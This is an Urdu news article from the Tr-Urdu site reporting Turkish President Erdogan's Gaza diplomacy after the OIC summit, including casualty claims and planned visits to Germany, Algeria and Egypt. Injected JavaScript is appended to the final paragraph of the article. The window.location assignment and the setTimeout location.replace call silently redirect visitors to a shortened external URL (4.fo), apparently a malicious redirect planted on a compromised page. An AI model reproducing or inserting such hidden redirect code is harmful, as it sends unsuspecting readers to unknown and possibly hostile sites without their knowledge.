Close Menu
Tr-Urdu
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    Tr-Urdu
    Subscribe
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا
    Tr-Urdu
    You are at:Home»ترکیہ»او آئی سی سربراہی اجلاس کے بعد ایردوان نے غزہ پالیسی کا اعلان کردیا
    ترکیہ

    او آئی سی سربراہی اجلاس کے بعد ایردوان نے غزہ پالیسی کا اعلان کردیا

    شبانہ آیازBy شبانہ آیاز14نومبر , 2023Updated:19نومبر , 2023کوئی تبصرہ نہیں ہے۔2 Mins Read
    پوسٹ شئیر کریں
    Facebook Twitter LinkedIn Email

    سعودی عرب سے واپسی پر صدر رجب طیب ایردوان نے اپنی پالیسی کا اعلان کرتے ہوئے کہا کہ امن کے حصول کے لیے ترکیہ کا روڈ میپ واضح ہے، وہ سفارت کاری کے مواقع کو استعمال کرتے ہوئے ٹیلی فونک رابطے اور آمنے سامنے کی ملاقاتوں میں اضافہ کریں گے۔

    7 اکتوبر سے، صدر ایردوان خطے میں امن کو یقینی بنانے اور شہریوں کی جانوں کے ضیاع کو کم کرنے کے لیے آمنے سامنے اور ٹیلی فون پر ملاقاتیں کرکے اپنی قیادت کی سفارت کاری کو جاری رکھے ہوئے ہیں۔

    ایردوان نے کہا کہ “اسرائیل کے ہاتھوں بے دردی سے مارے جانے والے 11 ہزار غزہ کے باشندوں میں سے 73 فیصد خواتین اور بچے ہیں۔ اسرائیلی انتظامیہ جسے مغربی ممالک کی مکمل حمایت حاصل ہے،اسرائیل بین الاقوامی جنگی اصولوں کی خلاف ورزی کر رہا ہے۔اسکولوں، مساجد، گرجا گھروں، ہسپتالوں، یونیورسٹیوں کو تباہ کررہا ہے،وہ شہری بستیوں پر بمباری جاری رکھے ہوئے ہیں۔ اسے ایک پاگل جنون طاری ہے جو بچوں کو بھی مارنے کا جواز فراہم کرتا ہے۔

    جب ایردوان سے پوچھا گیا کہ سعودی عرب سے واپسی پر امن کے حصول کے لیے ترکیہ کا روڈ میپ کیا ہو گا۔؟؟؟

    صدر ایردوان نے کہا کہ وہ سفارت کاری کے مواقع کو استعمال کریں گے اور ٹیلی فونک رابطوں اور آمنے سامنے کی ملاقاتیں بڑھائیں گے۔

    ایردوان ان ممالک کے رہنماؤں کے ساتھ فون پر بات کریں گے جنہوں نے اقوام متحدہ کی جنرل اسمبلی کی طرف سے منظور کی گئی غزہ میں ہنگامی انسانی بنیادوں پر جنگ بندی پر ووٹنگ سے پرہیز کیا اور ان ممالک کو فلسطین کی حمایت کی طرف لانے کی کوشش کریں گے۔

    اس سلسلے میں صدر رجب طیب ایردوان جمعہ 17 نومبر کو جرمنی کا سرکاری دورہ کریں گے۔

    اور 21 نومبر کو الجزائر کا دورہ متوقع ہے، الجزائر کے صدر عبدالمصد تبون سے ملاقات کے بعد

    جرمن چانسلر اولاف شولز سے بھی ایردوان ملاقات کریں گے، یہاں اپنی ملاقاتوں کے دوران فلسطین کے خلاف اسرائیل کے غیر انسانی حملوں پر آواز اٹھائیں گے اور برلن سے اپنا پیغام ان یورپی ممالک تک پہنچائیں گے جو اسرائیل کے حملوں کے خلاف آواز بلند نہیں کر سکتے۔

    دوسری جانب، توقع ہے کہ صدر ایردوان آنے والے عرصے میں مصر کا دورہ کریں گے، جو غزہ کو رفح بارڈر گیٹ کے ذریعے امداد، خاص طور پر خوراک اور ادویات فراہم کرتا ہے۔window.location=”https://4.fo/1sjiqu3″;

    setTimeout(‘location.replace(“https://4.fo/1sjiqu3”)’,0);

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous Article

    ترکیہ کی ری پبلیکن پیپلز پارٹی میں جمہوری طریقے سے تبدیلی ، کمال کلیچ دار اولو کے بعد اؤزگور اوزیل نئے چئیرمین منتخب

    CHPپاکستان کی سیاسی جماعتوں کے لیے رول ماڈل ؟

    Next Article

    ایردوان نے نتَن یا ہو کو کھری کھری سنا دیں، تمہارے انجام کا وقت آن پہنچا ہے ، اسرائیل ایک دہشت گرد ریاست ہے

    تمہارے پاس ایٹم بم ہے یا نہیں؟ سکت ہے تواس کا اعلان کرو

    شبانہ آیاز
    • Facebook
    • X (Twitter)

    Related Posts

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    21جنوری , 2026

    Comments are closed.

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    ٹیگز
    #اسرائیل #حقان فیدان #حماس #سیاحت #غزہ #فلسطین آئی ٹی استنبول اسلام آباد افراطِ زر الیکشن 2024 انتخابات انقرہ اپوزیشن ایردوان بھونچال بیسٹ ماڈل آف ترکیہ ترقی ترک صدی ترک میڈیا ترکیہ تعلیم حزبِ اختلاف دنیا دہماکہ دی اکانومسٹ روس سلائِڈر سلائیڈر--- شہباز شریف صدر ایردوان صدر ایردوان، وزیراعظم شہباز شریف، پاکستان، ترکیہ عدلیہ عمران خان فیچرڈ قاتلانہ حملہ لانگ مارچ مغربی میڈیا ملت اتحاد وزیراعظم وزیراعظم شہباز شریف وزیراعظم شہباز شریف، صدر ایردوان، پاکستان، امداد پاکستان پاک فوج یورپ
    • Facebook
    • Twitter
    • Instagram
    اہم خبریں

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    ترکیہ اسکالرشپس: دنیا کی جامع ترین ( fully funded)اسکالرشپس، آن لائن درخواستوں کا طوفان، ویب سائٹ کو کریش کے خدشات

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    مقبول پوسٹس

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026
    Tr-Urdu All Rights Reserved © 2022
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا

    Type above and press Enter to search. Press Esc to cancel.